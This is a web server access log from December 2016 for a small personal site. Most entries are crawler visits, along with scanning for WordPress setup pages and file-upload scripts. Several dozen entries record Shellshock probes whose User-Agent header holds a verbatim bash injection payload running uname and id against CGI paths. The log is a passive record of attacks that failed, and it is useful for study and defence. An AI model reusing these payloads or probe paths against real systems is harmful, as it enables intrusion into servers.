70.138.201.1 - - [01/Dec/2016:02:24:34 +0100] "GET / HTTP/1.1" 200 569 "-" "Java/1.8.0_111"
70.138.201.1 - - [01/Dec/2016:02:24:34 +0100] "GET /picture/img001.png HTTP/1.1" 200 643437 "-" "Java/1.8.0_111"
46.229.164.102 - - [01/Dec/2016:18:05:26 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; SemrushBot/1.1~bl; +http://www.semrush.com/bot.html)"
66.249.64.254 - - [02/Dec/2016:02:08:45 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.254 - - [02/Dec/2016:02:08:46 +0100] "GET / HTTP/1.1" 200 569 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
46.229.164.102 - - [02/Dec/2016:18:54:04 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; SemrushBot/1.1~bl; +http://www.semrush.com/bot.html)"
66.249.66.46 - - [02/Dec/2016:19:48:23 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.40 - - [02/Dec/2016:19:48:23 +0100] "GET / HTTP/1.1" 200 569 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
45.55.231.252 - - [02/Dec/2016:20:54:46 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )"
45.55.231.252 - - [02/Dec/2016:20:54:51 +0100] "GET / HTTP/1.1" 200 569 "-" "Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )"
66.249.66.43 - - [03/Dec/2016:06:52:57 +0100] "GET / HTTP/1.1" 200 569 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
23.23.54.109 - - [03/Dec/2016:07:47:24 +0100] "GET /robots.txt HTTP/1.0" 404 1256 "-" "CCBot/2.0 (http://commoncrawl.org/faq/)"
23.23.54.109 - - [03/Dec/2016:07:47:25 +0100] "GET / HTTP/1.0" 200 569 "-" "CCBot/2.0 (http://commoncrawl.org/faq/)"
95.91.45.48 - - [03/Dec/2016:09:32:46 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)"
95.91.45.48 - - [03/Dec/2016:09:32:47 +0100] "GET / HTTP/1.1" 200 569 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)"
195.154.181.162 - - [03/Dec/2016:18:10:56 +0100] "GET /_file-manager/php/connector.php HTTP/1.1" 404 1256 "http://www.die-fabians.de/_file-manager/php/connector.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36"
5.10.148.125 - - [03/Dec/2016:19:49:48 +0100] "GET /robots.txt HTTP/1.0" 404 1256 "-" "Mozilla/5.0 (compatible; electricmonk/3.2.0 +https://www.duedil.com/our-crawler/)"
5.10.148.125 - - [03/Dec/2016:19:49:51 +0100] "GET / HTTP/1.0" 200 569 "-" "Mozilla/5.0 (compatible; electricmonk/3.2.0 +https://www.duedil.com/our-crawler/)"
46.229.164.102 - - [04/Dec/2016:06:05:02 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; SemrushBot/1.1~bl; +http://www.semrush.com/bot.html)"
35.163.30.202 - - [04/Dec/2016:20:49:36 +0100] "GET / HTTP/1.1" 200 569 "-" "WWW-Mechanize/1.73"
46.229.164.102 - - [05/Dec/2016:07:03:21 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; SemrushBot/1.1~bl; +http://www.semrush.com/bot.html)"
62.138.0.25 - - [05/Dec/2016:08:41:24 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; seoscanners.net/1; +spider@seoscanners.net)"
62.138.0.25 - - [05/Dec/2016:08:41:26 +0100] "GET /picture/img001.png HTTP/1.1" 200 643437 "-" "Mozilla/5.0 (compatible; seoscanners.net/1; +spider@seoscanners.net)"
138.201.30.66 - - [06/Dec/2016:05:44:29 +0100] "GET /robots.txt HTTP/1.0" 404 1256 "-" "Mozilla/5.0 (compatible; SEOkicks-Robot; +http://www.seokicks.de/robot.html)"
138.201.30.66 - - [06/Dec/2016:05:44:30 +0100] "GET / HTTP/1.0" 200 569 "-" "Mozilla/5.0 (compatible; SEOkicks-Robot; +http://www.seokicks.de/robot.html)"
64.246.161.30 - - [06/Dec/2016:08:25:10 +0100] "GET /robots.txt HTTP/1.0" 404 1256 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
64.246.161.30 - - [06/Dec/2016:08:25:10 +0100] "GET / HTTP/1.1" 200 569 "http://whois.domaintools.com/die-fabians.de" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)"
46.229.164.102 - - [06/Dec/2016:08:35:12 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; SemrushBot/1.1~bl; +http://www.semrush.com/bot.html)"
136.243.36.100 - - [07/Dec/2016:05:35:58 +0100] "GET / HTTP/1.1" 200 569 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)"
46.229.164.102 - - [07/Dec/2016:09:44:10 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; SemrushBot/1.1~bl; +http://www.semrush.com/bot.html)"
198.204.240.42 - - [07/Dec/2016:12:12:37 +0100] "GET / HTTP/1.0" 200 569 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
83.36.35.158 - - [07/Dec/2016:13:18:33 +0100] "GET / HTTP/1.1" 200 569 "-" "Java/1.8.0_65"
83.36.35.158 - - [07/Dec/2016:13:18:33 +0100] "GET /picture/img001.png HTTP/1.1" 200 643437 "-" "Java/1.8.0_65"
45.32.154.55 - - [07/Dec/2016:16:41:44 +0100] "GET / HTTP/1.1" 200 569 "-" "Java/1.4.1_04"
45.32.154.55 - - [07/Dec/2016:16:41:44 +0100] "GET /picture/img001.png HTTP/1.1" 200 643437 "-" "Java/1.4.1_04"
138.201.30.66 - - [07/Dec/2016:19:15:48 +0100] "GET /robots.txt HTTP/1.0" 404 1256 "-" "Mozilla/5.0 (compatible; SEOkicks-Robot; +http://www.seokicks.de/robot.html)"
138.201.30.66 - - [07/Dec/2016:19:15:50 +0100] "GET / HTTP/1.0" 200 569 "-" "Mozilla/5.0 (compatible; SEOkicks-Robot; +http://www.seokicks.de/robot.html)"
46.229.164.102 - - [08/Dec/2016:08:57:09 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; SemrushBot/1.1~bl; +http://www.semrush.com/bot.html)"
195.154.183.187 - - [08/Dec/2016:16:03:00 +0100] "GET /wp/wp-admin/setup-config.php HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko"
195.154.183.187 - - [08/Dec/2016:16:03:00 +0100] "GET /blog/wp-admin/setup-config.php HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko"
195.154.183.187 - - [08/Dec/2016:16:03:00 +0100] "GET /wordpress/wp-admin/setup-config.php HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko"
195.154.183.187 - - [08/Dec/2016:16:03:00 +0100] "GET /backup/wp-admin/setup-config.php HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko"
195.154.199.56 - - [08/Dec/2016:17:07:40 +0100] "GET /license.php HTTP/1.0" 404 1256 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
195.154.199.145 - - [08/Dec/2016:18:26:08 +0100] "GET /wp-content/upgrade/theme-compat/popup-pomo.php HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko"
87.210.17.86 - - [08/Dec/2016:23:17:30 +0100] "GET / HTTP/1.1" 200 569 "-" "Java/1.8.0_111"
87.210.17.86 - - [08/Dec/2016:23:17:31 +0100] "GET /picture/img001.png HTTP/1.1" 200 643437 "-" "Java/1.8.0_111"
136.243.36.100 - - [09/Dec/2016:01:12:19 +0100] "GET / HTTP/1.1" 200 569 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)"
136.243.36.100 - - [09/Dec/2016:01:12:36 +0100] "GET /sitemap.xml HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)"
45.32.157.238 - - [09/Dec/2016:07:19:11 +0100] "GET / HTTP/1.1" 200 569 "-" "Java/1.8.0_111"
45.32.157.238 - - [09/Dec/2016:07:19:11 +0100] "GET /picture/img001.png HTTP/1.1" 200 643437 "-" "Java/1.8.0_111"
40.77.167.29 - - [09/Dec/2016:08:04:14 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.29 - - [09/Dec/2016:08:04:43 +0100] "GET /picture/img001.png HTTP/1.1" 200 643437 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
110.170.208.141 - - [09/Dec/2016:13:10:08 +0100] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 1256 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\""
110.170.208.141 - - [09/Dec/2016:13:10:14 +0100] "GET /cgi-bin/status/status.cgi HTTP/1.1" 404 1256 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\""
110.170.208.141 - - [09/Dec/2016:13:10:19 +0100] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 404 1256 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\""
110.170.208.141 - - [09/Dec/2016:13:10:24 +0100] "GET /cgi-mod/index.cgi HTTP/1.1" 404 1256 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\""
110.170.208.141 - - [09/Dec/2016:13:10:30 +0100] "GET /cgi-bin/test.cgi HTTP/1.1" 404 1256 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\""
110.170.208.141 - - [09/Dec/2016:13:10:35 +0100] "GET /cgi-bin-sdb/printenv HTTP/1.1" 404 1256 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\""
110.170.208.141 - - [09/Dec/2016:13:10:40 +0100] "GET /cgi-bin/index.cgi HTTP/1.1" 404 1256 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\""
110.170.208.141 - - [09/Dec/2016:13:10:46 +0100] "GET / HTTP/1.1" 200 569 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\""
110.170.208.141 - - [09/Dec/2016:13:10:51 +0100] "GET /cgi-bin/php HTTP/1.1" 404 1256 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\""
110.170.208.141 - - [09/Dec/2016:13:10:56 +0100] "GET /cgi-bin/php4 HTTP/1.1" 404 1256 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\""
110.170.208.141 - - [09/Dec/2016:13:11:02 +0100] "GET /cgi-bin/php5 HTTP/1.1" 404 1256 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\""
110.170.208.141 - - [09/Dec/2016:13:11:07 +0100] "GET /cgi-bin/ HTTP/1.1" 404 1256 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\""
110.170.208.141 - - [09/Dec/2016:13:11:12 +0100] "GET /cgi-bin/php-cgi HTTP/1.1" 404 1256 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\""
110.170.208.141 - - [09/Dec/2016:13:11:17 +0100] "GET /sys-cgi HTTP/1.1" 404 1256 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\""
46.229.164.99 - - [10/Dec/2016:01:10:52 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; SemrushBot/1.1~bl; +http://www.semrush.com/bot.html)"
195.154.199.56 - - [10/Dec/2016:01:27:55 +0100] "GET /license.php HTTP/1.0" 404 1256 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
195.154.199.56 - - [10/Dec/2016:01:27:55 +0100] "GET /license.php HTTP/1.0" 404 1256 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
5.255.251.7 - - [10/Dec/2016:02:13:59 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
5.10.148.125 - - [10/Dec/2016:09:45:07 +0100] "GET /robots.txt HTTP/1.0" 404 1256 "-" "Mozilla/5.0 (compatible; electricmonk/3.2.0 +https://www.duedil.com/our-crawler/)"
5.10.148.125 - - [10/Dec/2016:09:45:12 +0100] "GET / HTTP/1.0" 200 569 "-" "Mozilla/5.0 (compatible; electricmonk/3.2.0 +https://www.duedil.com/our-crawler/)"
46.102.98.5 - - [10/Dec/2016:10:16:18 +0100] "GET / HTTP/1.1" 200 569 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.71 Safari/537.36"
46.102.98.5 - - [10/Dec/2016:10:16:19 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.71 Safari/537.36"
130.185.159.132 - - [10/Dec/2016:10:16:19 +0100] "GET /admin HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.71 Safari/537.36"
77.81.95.209 - - [10/Dec/2016:10:16:19 +0100] "GET /wp-admin HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.71 Safari/537.36"
165.231.99.13 - - [10/Dec/2016:10:16:19 +0100] "GET /administrator HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.71 Safari/537.36"
46.102.98.5 - - [10/Dec/2016:10:16:19 +0100] "HEAD /sitemap.xml HTTP/1.1" 404 - "-" "-"
165.231.99.13 - - [10/Dec/2016:10:16:19 +0100] "HEAD /sitemap_index.xml HTTP/1.1" 404 - "-" "-"
77.81.95.209 - - [10/Dec/2016:10:16:19 +0100] "HEAD /test-for-404-page HTTP/1.1" 404 - "-" "-"
87.210.17.86 - - [10/Dec/2016:13:10:43 +0100] "GET / HTTP/1.1" 200 569 "-" "Java/1.8.0_111"
87.210.17.86 - - [10/Dec/2016:13:10:55 +0100] "GET /picture/img001.png HTTP/1.1" 200 643437 "-" "Java/1.8.0_111"
66.249.64.250 - - [10/Dec/2016:18:03:14 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.246 - - [10/Dec/2016:18:03:14 +0100] "GET / HTTP/1.1" 200 569 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
136.243.36.100 - - [10/Dec/2016:21:39:31 +0100] "GET / HTTP/1.1" 200 569 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)"
5.255.251.7 - - [10/Dec/2016:22:29:20 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
46.229.164.99 - - [11/Dec/2016:01:50:26 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; SemrushBot/1.1~bl; +http://www.semrush.com/bot.html)"
45.63.116.197 - - [11/Dec/2016:01:53:45 +0100] "GET / HTTP/1.1" 200 569 "-" "Java/1.8.0_111"
45.63.116.197 - - [11/Dec/2016:01:53:45 +0100] "GET /picture/img001.png HTTP/1.1" 200 643437 "-" "Java/1.8.0_111"
83.41.11.252 - - [11/Dec/2016:06:17:22 +0100] "GET / HTTP/1.1" 200 569 "-" "Java/1.8.0_101"
83.41.11.252 - - [11/Dec/2016:06:17:22 +0100] "GET /picture/img001.png HTTP/1.1" 200 643437 "-" "Java/1.8.0_101"
62.235.63.160 - - [11/Dec/2016:09:15:23 +0100] "GET / HTTP/1.1" 200 569 "http://MockupUI.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5"
85.145.10.210 - - [11/Dec/2016:11:50:43 +0100] "GET / HTTP/1.1" 200 569 "-" "Java/1.8.0_111"
85.145.10.210 - - [11/Dec/2016:11:50:43 +0100] "GET /picture/img001.png HTTP/1.1" 200 643437 "-" "Java/1.8.0_111"
138.201.30.66 - - [11/Dec/2016:14:54:10 +0100] "GET /robots.txt HTTP/1.0" 404 1256 "-" "Mozilla/5.0 (compatible; SEOkicks-Robot; +http://www.seokicks.de/robot.html)"
138.201.30.66 - - [11/Dec/2016:14:54:13 +0100] "GET / HTTP/1.0" 200 569 "-" "Mozilla/5.0 (compatible; SEOkicks-Robot; +http://www.seokicks.de/robot.html)"
46.229.164.99 - - [12/Dec/2016:02:55:58 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; SemrushBot/1.1~bl; +http://www.semrush.com/bot.html)"
46.229.168.73 - - [12/Dec/2016:17:01:42 +0100] "GET / HTTP/1.1" 200 569 "-" "Mozilla/5.0 (compatible; SemrushBot/1.1~bl; +http://www.semrush.com/bot.html)"
136.243.36.100 - - [12/Dec/2016:20:44:34 +0100] "GET / HTTP/1.1" 200 569 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)"
136.243.36.100 - - [12/Dec/2016:20:44:57 +0100] "GET /sitemap.xml HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)"
178.255.215.83 - - [13/Dec/2016:02:53:17 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
178.255.215.83 - - [13/Dec/2016:02:53:17 +0100] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
195.154.181.15 - - [13/Dec/2016:03:21:28 +0100] "GET /up.php?up=hous HTTP/1.1" 404 1256 "http://www.die-fabians.de/up.php?up=hous" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36"
46.229.164.99 - - [13/Dec/2016:03:42:31 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; SemrushBot/1.1~bl; +http://www.semrush.com/bot.html)"
138.201.59.34 - - [13/Dec/2016:17:16:07 +0100] "GET /robots.txt HTTP/1.0" 404 1256 "-" "Mozilla/5.0 (compatible; SEOkicks-Robot; +http://www.seokicks.de/robot.html)"
138.201.59.34 - - [13/Dec/2016:17:16:10 +0100] "GET / HTTP/1.0" 200 569 "-" "Mozilla/5.0 (compatible; SEOkicks-Robot; +http://www.seokicks.de/robot.html)"
208.43.225.85 - - [13/Dec/2016:18:23:51 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)"
208.43.225.85 - - [13/Dec/2016:18:23:54 +0100] "GET / HTTP/1.1" 200 569 "-" "Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)"
104.131.27.110 - - [13/Dec/2016:18:52:16 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )"
104.131.27.110 - - [13/Dec/2016:18:52:21 +0100] "GET / HTTP/1.1" 200 569 "-" "Mozilla/5.0 (compatible; spbot/5.0.3; +http://OpenLinkProfiler.org/bot )"
46.229.164.99 - - [14/Dec/2016:04:29:31 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; SemrushBot/1.1~bl; +http://www.semrush.com/bot.html)"
66.249.76.91 - - [14/Dec/2016:10:29:49 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.91 - - [14/Dec/2016:10:29:49 +0100] "GET / HTTP/1.1" 200 569 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
136.243.155.93 - - [14/Dec/2016:15:00:54 +0100] "GET /robots.txt HTTP/1.0" 404 1256 "-" "Mozilla/5.0 (compatible; SEOkicks-Robot; +http://www.seokicks.de/robot.html)"
136.243.155.93 - - [14/Dec/2016:15:00:56 +0100] "GET / HTTP/1.0" 200 569 "-" "Mozilla/5.0 (compatible; SEOkicks-Robot; +http://www.seokicks.de/robot.html)"
195.154.199.56 - - [14/Dec/2016:19:06:11 +0100] "GET /up.php HTTP/1.0" 404 1256 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
46.229.164.100 - - [15/Dec/2016:12:52:51 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; SemrushBot/1.1~bl; +http://www.semrush.com/bot.html)"
68.180.230.168 - - [15/Dec/2016:19:52:36 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
68.180.230.168 - - [15/Dec/2016:19:52:37 +0100] "GET / HTTP/1.1" 200 569 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
136.243.171.130 - - [16/Dec/2016:00:13:14 +0100] "GET / HTTP/1.1" 200 569 "-" "Java/1.4.1_04"
136.243.171.130 - - [16/Dec/2016:00:13:14 +0100] "GET /picture/img001.png HTTP/1.1" 200 643437 "-" "Java/1.4.1_04"
157.55.39.140 - - [16/Dec/2016:02:55:29 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.39.140 - - [16/Dec/2016:02:55:30 +0100] "GET / HTTP/1.1" 200 569 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.175 - - [16/Dec/2016:02:55:59 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
136.243.36.100 - - [16/Dec/2016:04:40:39 +0100] "GET / HTTP/1.1" 200 569 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)"
151.80.31.183 - - [16/Dec/2016:06:24:35 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; AhrefsBot/5.1; +http://ahrefs.com/robot/)"
163.172.64.178 - - [16/Dec/2016:06:24:35 +0100] "GET / HTTP/1.1" 200 569 "-" "Mozilla/5.0 (compatible; AhrefsBot/5.1; +http://ahrefs.com/robot/)"
144.76.60.98 - - [16/Dec/2016:13:25:47 +0100] "GET / HTTP/1.1" 200 569 "-" "Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)"
178.255.215.83 - - [16/Dec/2016:14:09:00 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
178.255.215.83 - - [16/Dec/2016:14:09:00 +0100] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
46.229.164.100 - - [16/Dec/2016:17:17:56 +0100] "GET /robots.txt HTTP/1.1" 404 1256 "-" "Mozilla/5.0 (compatible; SemrushBot/1.1~bl; +http://www.semrush.com/bot.html)"
110.170.208.141 - - [16/Dec/2016:18:19:00 +0100] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 1256 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\""
110.170.208.141 - - [16/Dec/2016:18:19:06 +0100] "GET /cgi-bin/status/status.cgi HTTP/1.1" 404 1256 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\""
110.170.208.141 - - [16/Dec/2016:18:19:11 +0100] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 404 1256 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\""
110.170.208.141 - - [16/Dec/2016:18:19:17 +0100] "GET /cgi-mod/index.cgi HTTP/1.1" 404 1256 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\""
110.170.208.141 - - [16/Dec/2016:18:19:22 +0100] "GET /cgi-bin/test.cgi HTTP/1.1" 404 1256 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\""
110.170.208.141 - - [16/Dec/2016:18:19:27 +0100] "GET /cgi-bin-sdb/printenv HTTP/1.1" 404 1256 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\""
110.170.208.141 - - [16/Dec/2016:18:19:33 +0100] "GET /cgi-bin/index.cgi HTTP/1.1" 404 1256 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\""
110.170.208.141 - - [16/Dec/2016:18:19:38 +0100] "GET / HTTP/1.1" 200 569 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\""
110.170.208.141 - - [16/Dec/2016:18:19:43 +0100] "GET /cgi-bin/php HTTP/1.1" 404 1256 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\""
110.170.208.141 - - [16/Dec/2016:18:19:48 +0100] "GET /cgi-bin/php4 HTTP/1.1" 404 1256 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\""
110.170.208.141 - - [16/Dec/2016:18:19:54 +0100] "GET /cgi-bin/php5 HTTP/1.1" 404 1256 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\""
110.170.208.141 - - [16/Dec/2016:18:19:59 +0100] "GET /cgi-bin/ HTTP/1.1" 404 1256 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\""
110.170.208.141 - - [16/Dec/2016:18:20:04 +0100] "GET /cgi-bin/php-cgi HTTP/1.1" 404 1256 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\""
110.170.208.141 - - [16/Dec/2016:18:20:09 +0100] "GET /sys-cgi HTTP/1.1" 404 1256 "-" "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo 333:; uname -a; echo 333:; id;\""
195.154.181.15 - - [17/Dec/2016:03:58:08 +0100] "GET /modules/attributewizardpro/file_upload.php HTTP/1.1" 404 1256 "http://www.die-fabians.de/modules/attributewizardpro/file_upload.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36"
